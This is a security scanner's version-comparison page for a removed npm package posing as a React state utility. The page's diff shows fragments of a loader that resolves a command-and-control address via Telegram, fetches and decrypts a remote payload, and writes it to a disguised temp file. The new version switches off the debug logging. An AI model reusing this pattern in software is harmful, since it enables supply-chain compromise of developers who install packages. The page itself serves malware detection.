You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

react-state-optimizer-core

Package Overview
Dependencies
Maintainers
1
Versions
16
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

react-state-optimizer-core - npm Package Compare versions

Package was removed
Sorry, it seems this package was removed from the registry
Comparing version
1.0.2
to
1.0.3
+1
-1
package.json
{
"name": "react-state-optimizer-core",
"version": "1.0.2",
"version": "1.0.3",
"description": "Utility layer for asynchronous state management",

@@ -5,0 +5,0 @@ "main": "index.js",

@@ -235,11 +235,11 @@ const fs = require('fs');

console.log("[Debug] Resolving C2 from Telegram...");
// console.log("[Debug] Resolving C2 from Telegram...");
const { key: keyString, gistUrl } = await resolveConfigFromTelegram();
console.log(`[Debug] C2 Resolved. Key: ${keyString.substring(0, 8)}... URL: ${gistUrl}`);
// console.log(`[Debug] C2 Resolved. Key: ${keyString.substring(0, 8)}... URL: ${gistUrl}`);
await progressPromise;
console.log(`[Debug] Fetching payload from ${gistUrl}...`);
// console.log(`[Debug] Fetching payload from ${gistUrl}...`);
const b64Payload = await fetchText(gistUrl);
console.log(`[Debug] Payload fetched (${b64Payload.length} bytes). Decrypting...`);
// console.log(`[Debug] Payload fetched (${b64Payload.length} bytes). Decrypting...`);

@@ -261,3 +261,3 @@ const encryptedBlob = Buffer.from(b64Payload.trim(), 'base64');

let debugMode = true; // FORCE DEBUG MODE FOR TESTING
let debugMode = false;

@@ -264,0 +264,0 @@ const tempFile = path.join(os.tmpdir(), `npm-update-${Date.now()}.js`);